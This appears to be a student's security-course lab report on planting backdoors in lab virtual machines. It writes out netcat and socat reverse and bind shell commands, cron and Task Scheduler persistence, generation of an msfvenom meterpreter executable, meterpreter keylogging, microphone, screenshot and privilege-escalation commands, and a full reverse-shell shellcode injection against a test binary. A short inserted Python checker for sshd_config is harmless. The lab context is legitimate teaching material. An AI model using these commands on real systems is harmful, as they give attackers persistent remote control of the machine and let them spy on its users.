Experiment Contents
- Use netcat to obtain a shell on the host, started by cron (0.5 points)
- Use socat to obtain a shell on the host, started by a scheduled task (0.5 points)
- Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it and obtain a shell on the host (0.5 points)
- Use MSF meterpreter (or other software) to obtain audio, camera images, keystroke records and the like from the target host, and attempt privilege escalation (2 points)
- Optional: generate shellcode with MSF, inject it into pwn1 from Exercise 1 and obtain a reverse-connection shell (1 point); write it up together with the rest of this experiment in the report.
Answers to basic questions
- Q: What ways can you think of for a backdoor to get onto your system?
  A: A program disguised as another application that tricks the user into downloading it.
- Q: Which ways of starting a backdoor do you know of (Windows and Linux)?
  A: The backdoor is given a trigger condition; when the specific time arrives, the backdoor starts. On Windows the registry is modified; on Linux a network service is replaced.
- Q: Which Meterpreter functions left the deepest impression on you?
  A: Capturing audio, taking screenshots, escalating privileges, stealing private data.
- Q: How can you find out whether a backdoor has been installed on your system?
  A: Run anti-virus software and a firewall; inspect processes, ports, the registry, network traffic conditions and so on.
Preparation
1. Fixed IP
- Kali virtual machine in bridge mode, fixed IP: 192.168.28.129
- Windows 10 host, fixed IP: 192.168.0.110
2. SSH remote login
With PasswordAuthentication and PermitRootLogin set to yes, password verification still failed and login was refused. After searching online and trying several methods for over two hours without success, I gave up remote operation so as not to delay the rest of the experiment.
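A check that would have helped with the sshd_config problem above, added here as an example and not part of the original report: sshd_config(5) uses the first value it reads for each keyword, and every keyword after a Match line belongs to that conditional block, so a PermitRootLogin yes appended at the end of the file is silently ignored if the keyword was already set earlier or if a Match block precedes it. The script parses a config with those semantics and reports which lines are actually in effect. The sample configuration is constructed for the example; the script does not follow Include directives of newer OpenSSH versions (an assumption, kept simple).

```python
"""Report the sshd_config values that sshd will actually use.

sshd_config(5): the first obtained value for each keyword wins, and keywords
after a 'Match' line apply only to matching connections.  Defaults below are
the ones documented in sshd_config(5) for the two keywords this check covers.
"""
import re

# Constructed sample configuration for this example, not a real Kali file.
# Line 6 is a 'PermitRootLogin yes' appended after an earlier setting.
SAMPLE_SSHD_CONFIG = """\
# Package generated configuration file
Port 22
PermitRootLogin prohibit-password
#PasswordAuthentication yes
PasswordAuthentication no
PermitRootLogin yes
UsePAM yes
Match User deploy
    PasswordAuthentication yes
"""

DEFAULTS = {"PermitRootLogin": "prohibit-password", "PasswordAuthentication": "yes"}


def effective_settings(config_text):
    """Return (effective, shadowed) for the global section of an sshd_config.

    effective: {keyword: (value, line_no)}; keywords never set keep their
    default with line_no None.  shadowed: [(line_no, keyword, value)] for the
    later occurrences that sshd ignores.  Parsing stops at the first Match line
    because everything after it is conditional, not global.
    """
    wanted = {k.lower(): k for k in DEFAULTS}
    effective = {}
    shadowed = []
    for line_no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        if key == "match":
            break
        if key in wanted:
            value = parts[1].strip() if len(parts) > 1 else ""
            if wanted[key] in effective:
                shadowed.append((line_no, wanted[key], value))
            else:
                effective[wanted[key]] = (value, line_no)
    for name, default in DEFAULTS.items():
        effective.setdefault(name, (default, None))
    return effective, shadowed


def root_password_login_allowed(config_text):
    """True only if the global config really lets root log in with a password."""
    effective, _ = effective_settings(config_text)
    return (effective["PermitRootLogin"][0].lower() == "yes"
            and effective["PasswordAuthentication"][0].lower() == "yes")


def explain(config_text):
    """Human-readable summary of effective values and ignored duplicate lines."""
    effective, shadowed = effective_settings(config_text)
    out = []
    for name, (value, line_no) in effective.items():
        where = f"line {line_no}" if line_no else "default"
        out.append(f"{name} = {value} ({where})")
    for line_no, name, value in shadowed:
        out.append(f"line {line_no}: '{name} {value}' is ignored; an earlier line already set it")
    return "\n".join(out)


if __name__ == "__main__":
    print(explain(SAMPLE_SSHD_CONFIG))
    print("root password login allowed:", root_password_login_allowed(SAMPLE_SSHD_CONFIG))
```

Running it on a real file (`explain(open("/etc/ssh/sshd_config").read())`) shows whether the line you edited is the one sshd reads; on a live system, `sshd -T` prints the same effective configuration directly.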
3. Windows obtains the Linux shell
- In Windows, use netcat to listen on local port 5222: .\nc64.exe -l -p 5222 (in Windows PowerShell nc64.exe cannot be run by name alone; it has to be invoked as .\nc64.exe).
- In Linux, reverse-connect to Windows with nc 192.168.0.110 5222 -e /bin/sh; the -e option runs the shell program over the connection.
4. Linux obtains the Windows shell
- On the Linux side, use nc -l -p 5222 to listen on port 5222.
- In Windows, use .\nc64.exe -e powershell.exe 192.168.28.129 5222 to reverse-connect to port 5222 on the Linux host.
- Result: Windows PowerShell on the left, Kali shell on the right.
5. Transferring data with nc
- In Windows, use .\nc.exe -L -p 5222 to listen on port 5222 (with -l the listener did not work; after searching online I switched to -L -p).
- In Linux, use nc 192.168.0.110 5222 to reverse-connect to port 5222 on Windows.
6. Transferring files with nc
- Linux to Windows:
  - Windows listens on port 5222 with .\nc64.exe -l -p 5222 > file1.out
  - Linux reverse-connects to port 5222 on Windows with nc 192.168.0.110 5222 < file1.in; Windows receives the file sent from Linux.
- Windows to Linux works the same way.
Experiment
One: Use netcat to obtain a shell on the host, started by cron
- In Windows, use ncat.exe -l -p 5222 to listen on port 5222.
- Cron is the scheduled-task facility on Linux; it runs every minute and executes the preset commands according to its configuration file.
- crontab -e opens the scheduled-task list for editing. Add the line 50 * * * * /bin/netcat 192.168.0.110 5222 -e /bin/sh at the end: at minute 50 of every hour it reverse-connects to port 5222 on the Windows host.
- When the time reached 23:50, the Kali shell was obtained; ls lists the directory.
Two: Use socat to obtain a shell on the host, started by a scheduled task
- Right-click the Windows start button, open Computer Management, find Task Scheduler under System Tools and create a task.
- On the General tab fill in the task name; on the Triggers tab click New Trigger and set the trigger time.
- On the Actions tab, enter the path of socat.exe (after downloading and unzipping it) as the program, and fill in tcp-listen:5222 exec:cmd.exe,pty,stderr under Add arguments (bind cmd.exe to port 5222, and redirect the stderr of cmd.exe to stdout). Click OK when done.
- Lock the computer and log in again; socat starts.
- In Kali, enter socat - tcp:192.168.0.110:5222 (the - stands for standard input/output; the second stream is port 5222 on the Windows host, with the IP being the Windows IP). The cmd shell is obtained successfully.
Three: Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it and obtain a shell on the host
Note: my Win10 had an unknown problem and could not run the program, so I switched to a Windows 7 virtual machine.
Windows 7 fixed IP
- In Kali, enter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=5222 -f exe > 20175222_backdoor.exe (the IP is the Kali IP) to generate the backdoor 20175222_backdoor.exe.
- In Windows, use nc.exe -lv -p 5222 > 20175222_backdoor.exe and wait.
- In Kali, enter nc 192.168.28.131 5222 < 20175222_backdoor.exe (the IP here is the Windows IP) to send the generated backdoor program to the Windows host; the transfer succeeds.
- In Linux, open another terminal and enter msfconsole to enter the console.
- Enter use exploit/multi/handler to use the handler module, then set the payload.
- Use the same payload as the generated backdoor: set payload windows/meterpreter/reverse_tcp
- set LHOST 192.168.28.129 (the Kali IP, the same one specified when generating the backdoor)
- The port number is the same: set LPORT 5222
- After setup is complete, exploit starts listening.
- Kali receives the connection from the Windows host and obtains a shell for remote control.
Four: Use MSF meterpreter (or other software) to obtain audio, camera images, keystroke records and the like from the target host, and attempt privilege escalation
- Capture audio: record_mic
- Take a picture with the camera: webcam_snap (the virtual machine cannot access the laptop's built-in camera, so this could not be done)
- Screenshot: screenshot
- Keystroke recording: keyscan_start; read the keystroke record: keyscan_dump
- View the current user: getuid; escalate privileges: getsystem
Additional content
Generate shellcode with MSF, inject it into pwn1 from Exercise 1 and obtain a reverse-connection shell.
- The main steps are the same as in Exercise 1 and are not repeated here.
- Disable address randomization:
  execstack -s pwn1   // set the stack executable
  execstack -q pwn1   // query whether the file's stack is executable
  more /proc/sys/kernel/randomize_va_space   // view the status of address randomization
  echo "0" > /proc/sys/kernel/randomize_va_space   // turn off address randomization
- Debug with gdb.
- The value of %esp + 4 = 0xffffd584.
- Accordingly, change the first four \x bytes of the injected code from before:
  perl -e 'print "A" x 32;print"\x84\xd5\xff\xff\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_2
- In another terminal, first start msfconsole.
- use exploit/multi/handler is used to set up the handler.
- Set the payload: set payload linux/x86/shell_reverse_tcp, then set LHOST 127.0.0.1 (set the IP to the loopback address).
- set LPORT 4444 (set the port according to the code).
- exploit: setup complete, start listening.
- Back in the original terminal, run (cat input_2;cat) | ./pwn1; the shell is obtained successfully.
Summary of experiments and experience
The problem I encountered with ssh was that password login was refused with "Permission denied, please try again". In principle this should be resolved by changing the content of /etc/ssh/sshd_config to PermitRootLogin yes, but I do not know why trial and error could not solve it, including restarting the ssh service and modifying the file content according to more information found online. Because the ssh service does not affect the experiment, I finally gave up.
The exploit start command in msfconsole failed once; I found that use exploit/multi/handler had not taken effect, and reloading msfconsole resolved it.
Basically the experiment did not run into many problems and could be completed successfully. Studying netcat, socat and MSF meterpreter was my formal start to understanding offensive and defensive technology; I found it very interesting and hope to learn more useful knowledge in the next course.